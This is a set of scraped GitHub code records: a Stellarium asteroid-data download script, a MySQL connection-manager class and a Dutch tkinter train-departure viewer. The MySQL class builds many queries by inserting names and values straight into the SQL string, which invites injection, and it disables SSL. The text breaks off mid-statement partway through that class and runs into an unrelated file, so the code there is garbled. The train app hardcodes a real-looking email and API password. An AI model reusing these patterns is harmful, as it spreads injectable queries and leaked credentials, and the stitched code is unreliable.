+{"seq_id": "4610265850", "text": "import os\nimport gzip\nimport requests\n\nURL = 'https://minorplanetcenter.net/Extended_Files/mpcorb_extended.dat.gz'\n\ndef run():\n path = '/tmp/mpcorb_extended.dat.gz'\n if not os.path.exists(path):\n print(f'download {URL}')\n r = requests.get(URL)\n with open(path, 'wb') as out:\n out.write(r.content)\n lines = gzip.open(path, 'rt').readlines()\n lines = [x for x in lines if len(x) > 162]\n # Remove Pluto (we have it as a planet)\n lines = [x for x in lines if x[175:180] != 'Pluto']\n # Sort by magnitude.\n lines = sorted(lines, key=lambda x: float(x[8:14].strip() or 'inf'))\n # Keep only 500 first.\n lines = lines[:500]\n out = open(\"apps/test-skydata/mpcorb.dat\", \"w\")\n for line in lines:\n print(line, file=out)\n out.close()\n\n\nif __name__ == '__main__':\n run()\n", "repo_name": "Stellarium/stellarium-web-engine", "sub_path": "tools/make-mpc.py", "file_name": "make-mpc.py", "file_ext": "py", "file_size_in_byte": 837, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 341, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "16701568407", "text": "\"\"\"\nThis python script is using official MySQL python connector from MySQL connector website.\nWhile official python module is using 'low level' MySQL querries,\nthis dbmanager wraps them around to more pythonic functions.\n\"\"\"\nimport sys\nimport os.path\nimport logging\nfrom contextlib import contextmanager\nfrom typing import List, Tuple, Any, Union\nfrom mysql.connector import Error, errorcode, pooling\nfrom functools import lru_cache\nfrom configparser import ConfigParser\n##=====================================\n\n\nAPP_DIR = os.path.dirname(os.path.abspath(__file__))\nLOGGING_CFG_FILE = os.path.join(APP_DIR, \"config\", \"logging_config.ini\")\n\nclass Connect:\n \"\"\" main connect class \"\"\"\n\n # Define the connection pool outside of the __init__ method\n cnxpool = None\n\n def __init__(self, cfg='config.ini', debug=False, pool_size=5):\n \"\"\"\n Initializes the database connection manager.\n\n :param cfg: Path to the configuration file, default is 'config.ini'.\n :param debug: Enables or disables debug mode, default is False.\n :param key: Optional key parameter.\n :param value: Optional value parameter.\n \"\"\"\n self.debug = debug\n self.init_logging()\n LOG.debug(\"log initialized\")\n self.cfgfile = cfg\n db_config = self.read_db_config(self.cfgfile)\n db_config[\"ssl_disabled\"] = True\n self.db_name = db_config.get(\"database\")\n self.key = None\n self.value = None\n self.conn = None\n self.pool = pooling.MySQLConnectionPool(pool_name=\"mypool\",\n pool_size=pool_size,\n **db_config)\n\n def __enter__(self):\n try:\n self.conn = self.pool.get_connection()\n if self.conn.is_connected():\n LOG.debug('Connected to MySQL database successfully')\n return self\n else:\n LOG.error('Failed to obtain connection from pool')\n # Handle the error as needed\n except Exception as e:\n LOG.error('Error while obtaining connection: %s', e)\n # Handle the error as needed\n\n def __exit__(self, exc_type, exc_value, traceback):\n \"\"\"\n Exits the context of the database connection manager, closing the connection if needed.\n\n :param exc_type: Exception type.\n :param exc_value: Exception value.\n :param traceback: Exception traceback.\n \"\"\"\n if self.conn and hasattr(self.conn, 'is_connected') and self.conn.is_connected():\n LOG.debug('Returning connection to pool')\n self.conn.close()\n logging.shutdown()\n\n @contextmanager\n def cursor(self):\n \"\"\"\n Provides a cursor to interact with the MySQL database. The cursor is buffered.\n\n :yield: Buffered cursor.\n \"\"\"\n cur = self.conn.cursor(buffered=True)\n try:\n yield cur\n finally:\n cur.close()\n\n @staticmethod\n def init_logging(log_file=None, append=False, console_loglevel=logging.CRITICAL, enable_console_logging=True):\n \"\"\"\n Initializes the logging system for the database connection manager.\n Configures the log level and format based on the debug setting.\n\n :param log_file: The path to the log file. 
If None, logging to a file is disabled.\n :param append: If True, append to the log file; otherwise, overwrite it.\n :param console_loglevel: The log level for console logging.\n :param enable_console_logging: If True, enable logging to the console.\n :return: None\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n\n if log_file is not None:\n filemode_val = 'a' if append else 'w'\n file_handler = logging.FileHandler(log_file, mode=filemode_val)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(logging.Formatter(\"%(asctime)s %(levelname)s %(threadName)s %(name)s %(message)s\"))\n logger.addHandler(file_handler)\n\n if enable_console_logging:\n console = logging.StreamHandler()\n console.setLevel(console_loglevel)\n console.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))\n logger.addHandler(console)\n\n global LOG\n LOG = logger\n\n @lru_cache(maxsize=100)\n def raw_call(self, call: str) -> Union[List, int]:\n \"\"\"\n Allows execution of a raw SQL call to the connected MySQL database.\n\n :param call: The raw SQL query string to execute.\n :return: The result of the query as a list of rows, or 0 if an error occurs.\n :raises Error: If there is an error in executing the query.\n \"\"\"\n with self.cursor() as cursor:\n query = call\n LOG.debug(\"EXECUTING: %s\", query)\n try:\n cursor.execute(query)\n get_query = cursor.fetchall()\n return get_query\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return None\n\n def save(self):\n \"\"\"\n Commits changes to the connected MySQL database.\n\n :return: None, as the method commits the changes to the database and logs a success message.\n \"\"\"\n self.conn.commit()\n LOG.debug('Changes Saved to DB')\n\n def test_connection(self):\n try:\n # You can use any light query to test the connection\n with self.cursor() as cursor:\n cursor.execute(\"SELECT 1\")\n return True\n except:\n return False\n\n def show_tables(self) -> List[str]:\n \"\"\"\n Retrieves the names of all the tables in the connected MySQL database.\n\n :return: A list of table names in the connected database.\n :raises Exception: If there is an error in retrieving table names.\n \"\"\"\n with self.cursor() as cursor:\n query: str = \"SHOW TABLES\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query)\n tables: List[str] = list(list(zip(*cursor.fetchall()))[0])\n return tables\n\n def get_primary_key(self, tablename: str) -> str:\n \"\"\"\n Retrieves the primary key column name for the specified table in the connected MySQL database.\n\n :param tablename: The name of the table for which to retrieve the primary key.\n :return: The name of the primary key column.\n :raises Exception: If there is an error in retrieving the primary key.\n \"\"\"\n with self.cursor() as cursor:\n query = \"SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_NAME` = %s) AND (`COLUMN_KEY` = 'PRI')\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query, (tablename,))\n primary_key_name = cursor.fetchone()[0]\n return primary_key_name\n\n def get_column_names(self, tablename: str) -> List[str]:\n \"\"\"\n Retrieves the names of all columns for the specified table in the connected MySQL database.\n\n :param tablename: The name of the table for which to retrieve the column names.\n :return: A list of column names.\n :raises Exception: If there is an error in retrieving the column names.\n \"\"\"\n with self.cursor() as cursor:\n query = \"SELECT column_name 
FROM information_schema.columns WHERE table_schema=%s AND table_name=%s ORDER BY ORDINAL_POSITION\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query, (self.db_name, tablename))\n column_names = list(list(zip(*cursor.fetchall()))[0])\n return column_names\n\n def get_all_rows(self, tablename: str) -> List[Tuple]:\n \"\"\"\n Retrieves all rows from the specified table in the connected MySQL database.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :return: A list of rows, where each row is represented as a tuple.\n :raises Exception: If there is an error in retrieving the rows.\n \"\"\"\n with self.cursor() as cursor:\n query = \"SELECT * FROM {0:s}\".format(tablename)\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query)\n all_rows = cursor.fetchall()\n return all_rows\n\n def get_column(self, tablename: str, column: str) -> List[Any]:\n \"\"\"\n Retrieves the values of a specific column from the specified table in the connected MySQL database.\n\n :param tablename: The name of the table from which to retrieve the column.\n :param column: The name of the column to retrieve.\n :return: A list of values representing the specified column.\n :raises Exception: If there is an error in retrieving the column.\n \"\"\"\n with self.cursor() as cursor:\n query = f\"SELECT `{column}` FROM `{tablename}`\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query)\n db_data = cursor.fetchall()\n all_rows = list(tuple(zip(*db_data))[0])\n return all_rows\n\n def get_rows_from_columns(self, tablename: str, **cols) -> List[Tuple]:\n \"\"\"\n Retrieves specific columns from all rows of the specified table in the connected MySQL database.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :param cols: Keyword argument containing the \"columns\" key with a list of column names to retrieve.\n :return: A list of rows, where each row is represented as a tuple containing the specified columns.\n \"\"\"\n with self.cursor() as cursor:\n columns = ', '.join([f\"`{col}`\" for col in cols.get(\"columns\", [])])\n query = f\"SELECT {columns} FROM `{tablename}`\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query)\n all_rows = cursor.fetchall()\n return all_rows\n\n def get_rowss_from_columns_by_key(self, tablename: str, key: str, value: Any, **cols) -> List[Tuple]:\n \"\"\"\n Retrieves specific columns from the rows of the specified table in the connected MySQL database, filtered by a key-value pair.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :param key: The column name used as a key to filter the rows.\n :param value: The value corresponding to the key used to filter the rows.\n :param cols: Keyword argument containing the \"columns\" key with a list of column names to retrieve.\n :return: A list of rows, where each row is represented as a tuple containing the specified columns and matching the key-value pair.\n \"\"\"\n with self.cursor() as cursor:\n columns = ', '.join([f\"`{col}`\" for col in cols.get(\"columns\", [])])\n query = f\"SELECT {columns} FROM `{tablename}` WHERE `{key}` = %s\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query, (value,))\n all_rows = cursor.fetchall()\n return all_rows\n\n def get_rows_from_columns_by_key(self, tablename: str, key: str, value: Any) -> List[Tuple]:\n \"\"\"\n Retrieves all columns from the rows of the specified table in the connected MySQL database, filtered by a key-value pair.\n\n :param tablename: The name of the table from which 
to retrieve the rows.\n :param key: The column name used as a key to filter the rows.\n :param value: The value corresponding to the key used to filter the rows.\n :return: A list of rows, where each row is represented as a tuple containing all columns and matching the key-value pair.\n \"\"\"\n with self.cursor() as cursor:\n query = f\"SELECT * FROM `{tablename}` WHERE `{key}` = %s\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query, (value,))\n all_rows = cursor.fetchall()\n return all_rows\n\n def get_rows_from_columns_by_foregin_id(self, tablename: str, foregincolumn: str, foreginidx: Any, **cols) -> Union[List[Any], int]:\n \"\"\"\n Retrieves specific columns from the rows of the specified table in the connected MySQL database, filtered by a foreign key index.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :param foreigncolumn: The name of the foreign key column used for filtering.\n :param foreignidx: The foreign key index value used for filtering.\n :param cols: Keyword argument containing the \"columns\" key with a list or string representing the column names to retrieve.\n :return: A list of rows matching the foreign key filter, or 0 if an error occurs.\n :raises Error: If there is an error in executing the query.\n :raises TypeError: If no results are found.\n \"\"\"\n with self.cursor() as cursor:\n if not isinstance(cols.get(\"columns\"), str):\n columns = ','.join(map(str, cols.get(\"columns\")))\n else:\n columns = cols.get(\"columns\")\n query = \"SELECT {1:s} FROM {0:s} WHERE {2:s} = {3!r};\".format(tablename, columns, foregincolumn, str(foreginidx))\n\n try:\n cursor.execute(query)\n LOG.debug(\"EXECUTING: %s\", query)\n if len(cols.get(\"columns\"))==1 or isinstance(cols.get(\"columns\"), str):\n all_rows = [i[0] for i in cursor.fetchall()]\n else:\n\n all_rows =cursor.fetchall()\n return all_rows\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return 0\n except TypeError as err:\n LOG.debug(\"No results found %s\", err)\n return 0\n else:\n return 1\n\n def get_row_by_id(self, tablename: str, idx: Any) -> Union[Tuple, None]:\n \"\"\"\n Retrieves a single row from the specified table in the connected MySQL database, filtered by a specific index.\n\n :param tablename: The name of the table from which to retrieve the row.\n :param idx: The index value used to identify the specific row.\n :return: A tuple representing the single row matching the index, or None if not found.\n \"\"\"\n with self.cursor() as cursor:\n query1 = \"SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_NAME` = {0!r}) AND (`COLUMN_KEY` = 'PRI');\".format(tablename)\n LOG.debug(\"EXECUTING: %s\", query1)\n cursor.execute(query1)\n columnID = cursor.fetchone()[0]\n query2 = \"SELECT * FROM {0:s} WHERE {1:s} = {2!r};\".format(tablename, columnID, str(idx))\n LOG.debug(\"EXECUTING: %s\", query2)\n cursor.execute(query2)\n single_row = cursor.fetchone()\n return single_row\n\n def get_value_id(self, tablename: str, column: str, value: Any) -> Union[int, None]:\n \"\"\"\n Checks whether a specific value exists in the specified table and column in the connected MySQL database and retrieves the corresponding ID.\n\n :param tablename: The name of the table in which to check for the value.\n :param column: The name of the column in which to check for the value.\n :param value: The value to search for in the specified table and column.\n :return: The ID corresponding to the value if found, None if not found, or 0 if an 
error occurs.\n :raises Error: If there is an error in executing the query.\n \"\"\"\n with self.cursor() as cursor:\n query = \"SELECT @id:={3:s} AS id FROM {0:s} WHERE {1:s} = {2!r}\".format(tablename, column, value, self.get_primary_key(tablename))\n LOG.debug(\"EXECUTING: %s\", query)\n try:\n cursor.execute(query)\n get_query = cursor.fetchone()\n value_id = get_query[0] if get_query != None else None\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return 0\n else:\n return value_id\n\n def get_value_id_multiple(self, tablename: str, **colvals) -> Union[int, None]:\n \"\"\"\n Retrieves the value ID by comparing multiple entries in the specified table in the connected MySQL database.\n\n :param tablename: The name of the table in which to check for the values.\n :param colvals: Keyword argument containing the \"columns\" key with a list of column names and the \"values\" key with a corresponding list of values.\n :return: The ID corresponding to the matched columns and values if found, None if not found, or -1 if an error occurs.\n :raises Error: If there is an error in executing the query.\n \"\"\"\n with self.cursor() as cursor:\n columns = colvals.get(\"columns\")\n values = colvals.get(\"values\")\n keys = zip(columns, values)\n\n query = \"SELECT @id:={0:s} AS id FROM {1:s} WHERE\".format(self.get_primary_key(tablename), tablename)\n\n elements = (len(columns))\n for i, (key, value) in enumerate(keys):\n query += \" {0:s} = {1!r} \".format(key, value)\n query += \"AND\" if i < elements - 1 else \"\"\n LOG.debug(\"EXECUTING: %s\", query)\n\n try:\n cursor.execute(query)\n get_query = cursor.fetchone()\n value_id = get_query[0] if get_query != None else None\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return -1\n else:\n return value_id\n\n def get_value(self, tablename: str, column: str, idx: Any) -> Union[Any, int]:\n \"\"\"\n Retrieves a specific value from the specified table and column in the connected MySQL database, filtered by the primary key index.\n\n :param tablename: The name of the table from which to retrieve the value.\n :param column: The name of the column from which to retrieve the value.\n :param idx: The primary key index value used to identify the specific row.\n :return: The value corresponding to the specified column and index, or 0 if an error occurs.\n :raises Error: If there is an error in executing the query.\n :raises TypeError: If no results are found.\n \"\"\"\n with self.cursor() as cursor:\n query1 = \"SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_NAME` = {0!r}) AND (`COLUMN_KEY` = 'PRI');\".format(tablename)\n LOG.debug(\"EXECUTING: %s\", query1)\n\n try:\n cursor.execute(query1)\n columnID = cursor.fetchone()[0]\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return 0\n\n query2 = \"SELECT {1:s} FROM {0:s} WHERE {2:s} = {3!r};\".format(tablename, column, columnID, str(idx))\n LOG.debug(\"EXECUTING: %s\", query2)\n\n try:\n cursor.execute(query2)\n single_row = cursor.fetchone()[0]\n return single_row\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return 0\n except TypeError as err:\n LOG.debug(\"No results found %s\", err)\n return 0\n\n\n def value_exists(self, tablename: str, column: str, value: Any) -> int:\n \"\"\"\n Checks whether a specific value exists in the specified table and column in the connected MySQL database.\n\n :param tablename: The name of the table in which to check for the value.\n :param column: The name of the column in which to check for the value.\n :param value: The value to search for in the specified table and column.\n :return: The number of rows found with the specified value in the specified table and column.\n \"\"\"\n query = f\"SELECT `{column}`, COUNT(*) FROM `{tablename}` WHERE 
`{column}` = %s GROUP BY `{column}`\"\n LOG.debug(\"EXECUTING: %s\", query)\n with self.cursor() as cursor:\n cursor.execute(query, (value,))\n result = cursor.fetchone()\n number_of_rows_found = result[1] if result else 0\n return number_of_rows_found\n\n\n def value_exists_multiple(self, tablename, **colvals):\n \"\"\"\n Checks whether specific values exist in the specified table and columns in the connected MySQL database.\n\n :param tablename: The name of the table in which to check for the values.\n :param colvals: Keyword argument containing the \"columns\" key with a list of column names and the \"values\" key with a corresponding list of values.\n :return: The number of rows found with the specified values in the specified table and columns, or 0 if an error occurs or no results are found.\n :raises Error: If there is an error in executing the query.\n :raises TypeError: If no results are found.\n \"\"\"\n with self.cursor() as cursor:\n\n columns = colvals.get(\"columns\")\n values = colvals.get(\"values\")\n keys = zip(columns, values)\n query = \"SELECT {1:s}, COUNT(*) FROM {0:s} WHERE\".format(tablename, columns[0])\n\n elements = (len(columns))\n if elements > 1:\n for i, (key, value) in enumerate(keys):\n query += \" {0:s} = {1!r} \".format(key, value)\n query += \"AND\" if i', on_configure)\r\n\r\n frame3 = tk.Frame(canvas)\r\n frame3.configure(background=\"#ffc61e\")\r\n\r\n canvas.create_window((0, 0), window=frame3, anchor='nw')\r\n\r\n # buttons---------------------------------------------------------------------------------------\r\n # here is the code for the buttons to search for the requested station\r\n # and to go back to the start screen.\r\n\r\n menu = tk.Frame(self)\r\n menu.configure(background=\"#ffc61e\")\r\n menu.pack(side=tk.TOP, expand=tk.FALSE, fill=\"x\", padx=50)\r\n\r\n invoer = tk.Entry(menu, background=\"#ffc61e\")\r\n invoer.pack(side=tk.LEFT)\r\n invoer.insert(0, \"Utrecht\")\r\n\r\n run = tk.Button(menu, text=\"vind\", font=(\"Arial\", 22, \"bold\"), foreground=\"white\", background=\"#00337f\",\r\n command=lambda: station(invoer, frame3))\r\n run.pack(side=tk.LEFT)\r\n\r\n terug = tk.Button(menu, text=\"terug\", font=(\"Arial\", 22, \"bold\"), foreground=\"white\", background=\"#00337f\",\r\n command=lambda: (controller.show_frame(\"StartPage\"), invoer.delete(0, 'end'),\r\n invoer.insert(0, \"Utrecht\"), station(invoer, frame3)))\r\n terug.pack(side=tk.RIGHT)\r\n\r\n # logo of the NS (NOTE! 
put NSlogoklein.png in the same folder as this python file)\r\n # the NS background is blue == #00337f and yellow == #ffc61e\r\n photo_image_2 = tk.PhotoImage(file=\"NSlogoklein.png\")\r\n photo_label_2 = tk.Label(self, image=photo_image_2, width=220, height=80)\r\n photo_label_2.image = photo_image_2\r\n photo_label_2.pack(side=tk.BOTTOM, anchor=\"e\", padx=10, pady=10)\r\n\r\n station(invoer, frame3)\r\n\r\n# without a parameter (event) the scrollbar does not work\r\n# this function makes sure the size of the canvas is passed on to the scrollbar\r\n\r\n# Canvas is a global variable because\r\n# the function \"on_configure\" cannot receive a variable\r\n\r\n\r\ndef on_configure(event):\r\n global canvas\r\n canvas.configure(scrollregion=canvas.bbox('all'))\r\n\r\n\r\n# gets the specified station from the entry\r\n\r\ndef station(invoer, frame):\r\n plek = invoer.get()\r\n connect_and_print(plek, frame)\r\n\r\n\r\ndef connect_and_print(plek, frame):\r\n for widget in frame.winfo_children():\r\n widget.destroy()\r\n\r\n link = 'http://webservices.ns.nl/ns-api-avt?station=' + plek\r\n user = 'akiikimel@gmail.com'\r\n wachtwoord = 'h8YWmp9c23L0VovKZxa8AvWJMf6sotmcoTy8K75m0PSIGMaG6_KoJA'\r\n\r\n response = requests.get(link, auth=(user, wachtwoord)) # logs in and fetches the api\r\n vertrekxml = xmltodict.parse(response.text)\r\n\r\n # these lines create a header for the information\r\n tekst_set_1 = tk.Label(frame, text=\"| vertrektijd\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_2 = tk.Label(frame, text=\"| eindbestemming\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_3 = tk.Label(frame, text=\"| via\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_4 = tk.Label(frame, text=\"| spoor\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_5 = tk.Label(frame, text=\"| type\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_6 = tk.Label(frame, text=\"| vertraging\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_7 = tk.Label(frame, text=\"| rit\", background=\"#ffc61e\", font=\"bold\")\r\n\r\n tekst_set_1.grid(row=0, column=0, sticky=tk.W)\r\n tekst_set_2.grid(row=0, column=1, sticky=tk.W)\r\n tekst_set_3.grid(row=0, column=2, sticky=tk.W)\r\n tekst_set_4.grid(row=0, column=3, sticky=tk.W)\r\n tekst_set_5.grid(row=0, column=4, sticky=tk.W)\r\n tekst_set_6.grid(row=0, column=5, sticky=tk.W)\r\n tekst_set_7.grid(row=0, column=6, sticky=tk.W)\r\n\r\n # below, the api is read out and the info is brought to the screen\r\n rij = 1\r\n try:\r\n for vertrek in vertrekxml['ActueleVertrekTijden']['VertrekkendeTrein']:\r\n\r\n eindbestemming = vertrek['EindBestemming']\r\n try:\r\n spoor = vertrek[\"VertrekSpoor\"][\"#text\"]\r\n except KeyError:\r\n spoor = \"Nvt\"\r\n soort = vertrek[\"TreinSoort\"]\r\n rit = vertrek[\"RitNummer\"]\r\n try:\r\n via = vertrek[\"RouteTekst\"]\r\n except KeyError:\r\n via = \"Nvt\"\r\n\r\n try:\r\n vertraging = vertrek[\"VertrekVertragingTekst\"]\r\n except KeyError:\r\n vertraging = \" \"\r\n vertrektijd = vertrek['VertrekTijd'] # 2016-09-27T18:36:00+0200\r\n vertrektijd = vertrektijd[11:16] # 18:36\r\n\r\n tekst_set_1 = tk.Label(frame, text=\"| \" + vertrektijd, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_2 = tk.Label(frame, text=\"| \" + eindbestemming, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_3 = tk.Label(frame, text=\"| \" + via, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_4 = tk.Label(frame, text=\"| \" + spoor, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_5 = tk.Label(frame, 
text=\"| \" + soort, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_6 = tk.Label(frame, text=\"| \" + vertraging, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_7 = tk.Label(frame, text=\"| \" + rit, background=\"#ffc61e\", font=\"bold\")\r\n\r\n tekst_set_1.grid(row=rij, column=0, sticky=tk.W)\r\n tekst_set_2.grid(row=rij, column=1, sticky=tk.W)\r\n tekst_set_3.grid(row=rij, column=2, sticky=tk.W)\r\n tekst_set_4.grid(row=rij, column=3, sticky=tk.W)\r\n tekst_set_5.grid(row=rij, column=4, sticky=tk.W)\r\n tekst_set_6.grid(row=rij, column=5, sticky=tk.W)\r\n tekst_set_7.grid(row=rij, column=6, sticky=tk.W)\r\n\r\n rij += 1\r\n except KeyError:\r\n error_message = \"Geef een geldig station op.\"\r\n error_set_1 = tk.Label(frame, text=error_message, background=\"#ffc61e\", font=\"bold\")\r\n error_set_1.grid(row=1, column=0, columnspan=5, sticky=tk.W)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = Program()\r\n app.mainloop()\r\n", "repo_name": "freekgj/Miniproject-programming", "sub_path": "ns_vertrektijden1.py", "file_name": "ns_vertrektijden1.py", "file_ext": "py", "file_size_in_byte": 9518, "program_lang": "python", "lang": "nl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.Tk", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tkinter.Tk.__init__", "line_number": 9, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 13, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tkinter.Frame.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 41, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 42, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 43, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 45, "usage_type": "call"}, {"api_name": "tkinter.SUNKEN", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 49, "usage_type": "call"}, {"api_name": "tkinter.TRUE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tkinter.TRUE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tkinter.BOTTOM", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tkinter.BOTH", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tkinter.PhotoImage", "line_number": 61, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 67, "usage_type": 
"attribute"}, {"api_name": "tkinter.Frame.__init__", "line_number": 70, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.SUNKEN", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tkinter.BOTTOM", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tkinter.BOTH", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tkinter.Canvas", "line_number": 79, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tkinter.TRUE", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tkinter.Scrollbar", "line_number": 82, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 88, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 97, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tkinter.FALSE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tkinter.Entry", "line_number": 101, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 105, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 107, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 109, "usage_type": "call"}, {"api_name": "tkinter.RIGHT", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tkinter.PhotoImage", "line_number": 116, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 117, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 119, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 150, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 151, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 154, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 156, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 157, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 159, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 160, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 162, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 163, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 164, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 165, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 167, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 168, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 194, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 195, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 196, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 197, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 198, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 199, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 200, "usage_type": "call"}, {"api_name": "tkinter.W", 
"line_number": 202, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 203, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 204, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 205, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 206, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 207, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 208, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 213, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 214, "usage_type": "attribute"}]}
